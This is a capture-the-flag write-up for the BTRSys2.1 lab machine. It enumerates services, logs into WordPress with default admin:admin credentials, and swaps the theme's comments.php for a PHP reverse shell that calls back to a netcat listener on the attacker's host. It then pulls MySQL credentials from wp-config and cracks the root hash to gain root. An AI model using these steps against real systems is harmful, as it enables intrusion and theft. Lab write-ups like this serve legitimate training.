Security Analyst | Security Researcher | CRTP

Proving grounds Play: BTRSys2.1

Proving grounds Play - BTRSys2.1 CTF writeup.

Nmap

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 08eee3ff3120876c12e71caac4e754f2 (RSA)
|   256 ade11c7de78676be9aa8bdb968927787 (ECDSA)
|_  256 0ce1eb060c5cb5cc1bd1fa5606223167 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

80/tcp - open http - Apache httpd 2.4.18 ((Ubuntu))

http://192.168.169.50/ = Just a snake gif.

Directory Fuzzing

Discovered robots.txt file.

Disallow: Hackers
Allow: /wordpress/


 .o+.                    :o/                                                   -o+`                
  /hh:                    shh`                                                  +hh-                
  /hh:                    shh`                         -/:                      +hh-                
  /hh:                    shh`                         +s+                      +hh-                
  /hh/............   `....shh-....   ...............`  `-`   `..............`   +hh-          ..    
  /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/  oys   +ssssssssssssss/   +hh-        .+yy-   
  /hh+---------/hh+  .----yhh:----  :hho------------`  yhy`  oyy------------`   +hh-      .+yys:`   
  /hh:         -hh+       shh`      :hh+               yhy`  oyy                +hh-   `.+yys/`     
  /hh:         -hh+       shh`      :hh+               yhy`  oss          `--   +hhsssssyhy/`       
  /hh:         -hh+       shh`      :hh+               yhy`  `-.          +yy.  +hho+++osyy+.       
  /hh:         -hh+       shh`      :hh+               yhy`               +yy.  +hh-    `/syy+.     
  /hho:::::::::+hh+       shh`      :hh+               yhy`  .::::::::::::oyy.  +hh-      `/yyy/`   
  :yyyyyyyyyyyyyyy:       +ys`      .yy:               oys   +sssssssssssssss`  /ys.        `/sy-   
   ```````````````         `         ``                 `     ``````````````     ``                

http://192.168.169.50/wordpress/

WPScan

wpscan --url http://192.168.169.50/wordpress/ --enumerate u --enumerate p --enumerate t

Usernames

  • btrisk
  • admin

http://192.168.169.50/wordpress/wp-login.php

Login to the admin account using credentials admin:admin.

Initial Foothold

Download pentest monkey PHP reverse shell and make changes accordingly.

Navigate to Dashboard ➡️ Appearance ➡️ Editor ➡️ Comments.php. Ensure the changes we are making is to the right theme, and in order to confirm the theme is use to a particular page is by view-source of the page and check the theme.

Replace the contents of the comments.php file with the pentest monkey revserse shell and save the file.

Now navigate to the http://192.168.169.50/wordpress/ page and click the comments button to trigger the reverse shell.

naveenj@hackerspace:|09:44|~/proving_grounds/BTRSys2.1/files$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.190] from (UNKNOWN) [192.168.169.50] 53568
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 06:45:09 up  1:27,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (855): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/$ 

Initial Foothold Obtained

Privilege Escalation

Check the wp-config.php for database credentials and then use them to login to the mysql server. If there is any issue with the shell, for example:

www-data@ubuntu:/home/btrisk$ mysql -uroot -prootpassword!
mysql -uroot -prootpassword!
mysql: [Warning] Using a password on the command line interface can be insecure.

If there are no further update in the shell, then do the follwing command.

/usr/bin/script -qc /bin/bash /dev/null

This will resolve the issue and provide the right shell to work with.

Login to mysql

www-data@ubuntu:/$ mysql -uroot -prootpassword!
mysql -uroot -prootpassword!
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 132
Server version: 5.7.17-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
| phpmyadmin         |
| sys                |
| wordpress          |
+--------------------+
7 rows in set (0.00 sec)

mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------------+
| Tables_in_wordpress        |
+----------------------------+
| wp_abtest_experiments      |
| wp_abtest_goal_hits        |
| wp_abtest_goals            |
| wp_abtest_ip_filters       |
| wp_abtest_variation_views  |
| wp_abtest_variations       |
| wp_commentmeta             |
| wp_comments                |
| wp_links                   |
| wp_masta_campaign          |
| wp_masta_cronapi           |
| wp_masta_list              |
| wp_masta_reports           |
| wp_masta_responder         |
| wp_masta_responder_reports |
| wp_masta_settings          |
| wp_masta_subscribers       |
| wp_masta_support           |
| wp_options                 |
| wp_postmeta                |
| wp_posts                   |
| wp_term_relationships      |
| wp_term_taxonomy           |
| wp_terms                   |
| wp_usermeta                |
| wp_users                   |
+----------------------------+
26 rows in set (0.00 sec)

mysql> select * from wp_users;
select * from wp_users;
2 rows in set (0.00 sec)

mysql> 
root: a318e4507e5a74604aafb45e4741edd3

Crack the hash for the above, and use switch user command to login to root user. Cracked password for root roottoor.

www-data@ubuntu:/$ su root
su root
su: must be run from a terminal         #issue with the terminal
www-data@ubuntu:/$ /usr/bin/script -qc /bin/bash /dev/null          #resolution
/usr/bin/script -qc /bin/bash /dev/null
www-data@ubuntu:/$ su root          #switch user to root
su root
Password: roottoor

root@ubuntu:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/# 

Root Obtained

Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.